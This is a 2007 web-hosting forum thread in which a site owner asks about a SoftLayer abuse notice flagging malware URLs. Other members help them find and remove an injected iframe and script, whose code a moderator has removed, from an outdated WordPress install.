Results 1 to 11 of 11
  1. #1

    Received email from Softlayer Abuse about Malware

    Hi,

    I received this ticket from softlayer's abuse department:

    --------

    The following is a list of IP addresses on your network which we have good reason to believe may be compromised systems engaging in malicious activity. Please investigate and take appropriate action to stop any malicious activity you verify.

    The following is a list of types of activity that may appear in this
    report:
    BEAGLE BEAGLE3 BLASTER BOTNETS BOTS BRUTEFORCE
    DAMEWARE DEFACEMENT DIPNET DNSBOTS MALWAREURL MYDOOM
    NACHI PHATBOT PHISHING ROUTERS SCAN445 SCANNERS
    SINIT SLAMMER SPAM SPYBOT TOXBOT

    Open proxies and open mail relays may also appear in this report.
    Open proxies are designated by a two-character identifier (s4, s5, wg, hc, ho, hu, or fu) followed by a colon and a TCP port number. Open mail relays are designated by the word "relay" followed by a colon and a TCP port number.

    A detailed description of each of these may be found at
    https://security.gblx.net/reports.html

    NOTE: IPs identified as hosting botnet controllers, phishing websites, or malware distribution sites (marked with BOTNETS, PHISHING, or MALWAREURL respectively) may be null routed by Global Crossing following a separately emailed notice. We will make every effort to avoid taking action which will impact legitimate services on your network, and we will now send notices of botnet controllers within one hour of their detection.

    This report is sent every day. If you would prefer a weekly report, sent on Mondays, please contact us by replying to this email to request it. We would prefer, however, that you receive and act upon these reports daily.

    Unless otherwise indicated, time stamps are in UTC (GMT).



    36351 | 74.xx.xxx.xxx | 2007-12-25 14:50:13 http://xxxxxxxx MALWAREURL | SOFTLAYER - SoftLayer Technologies Inc.

    36351 | 74.xx.xxx.xxx | 2007-12-25 15:56:20 http://xxxxxxxx MALWAREURL | SOFTLAYER - SoftLayer Technologies Inc.

    ------

    Both the urls indicated are from the one site, containing a wordpress installation.

    The pages simply have a little bit of text and a youtube embedded video and nothing else. No comments.

    So what could be the problem? Don't understand this at all.

  2. #2
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,686
    They're telling you that you have a compromised server. Investigate it.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  3. #3
    okay thanks, i've told PSM about it.

  4. #4
    Quote Originally Posted by linux-tech View Post
    They're telling you that you have a compromised server. Investigate it.

    What you need to do is find the source.

    If you do not know how to clean out your server(s) and find where this is happening from you might need to check into getting a server administration service.

    I know that I have had this same problem, I contacted my administration company and he gave me proof that it was removed to send to the datacenter. I use www.cpadmin.net If you want to try them out it is $50.00/Month.
    .

  5. #5
    Join Date
    May 2006
    Posts
    72
    I think TS has already have their own as I assume PSM is platinum server management

  6. #6
    Join Date
    Aug 2004
    Location
    Canada
    Posts
    3,582
    Most likely those sites got exploited and a malicious iframe and javascript have been embedded into them. I'd look for that
    Tony B. - Chief Executive Officer
    Hawk Host Inc. Proudly serving websites since 2004
    Quality Shared and VPS Hosting
    PHP 5.3.x & PHP 5.4.x & PHP 5.5.X & PHP 5.6.X & PHP 7.0.X Support!

  7. #7
    hi, yes PSM = Platinum Server Management.

    They are looking into it for me.

    How does this happen exactly?

  8. #8
    Quote Originally Posted by TonyB View Post
    Most likely those sites got exploited and a malicious iframe and javascript have been embedded into them. I'd look for that
    Okay I looked at the source code and at the bottom of the page right after the html tage i found this:

    Code:
    <iframe src=<<removed>></iframe><script><<removed>></script>
    What is this and how did this get there??

    They hacked wordpress?
    Last edited by sirius; 12-28-2007 at 03:24 PM. Reason: removed malware code....

  9. #9
    Join Date
    Jan 2007
    Location
    Den Helder, Holland
    Posts
    765
    That clearly looks bad, have you removed it yet ?

  10. #10
    yes it was because i was running an older version of wordpress i believe.

    i completely re-installed to the newer version, and remove the hidden iframe. the iframe was actually at the bottom of pretty much every page.

    hopefully its fixed now.
    Last edited by jumpinjack; 12-28-2007 at 12:21 PM.

  11. #11
    Join Date
    Nov 2004
    Posts
    345
    Yup, that's how they work these days. Pretty tricky.

    Luckly Google has gotten into the act and will delist sites that have this type of infection on them.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •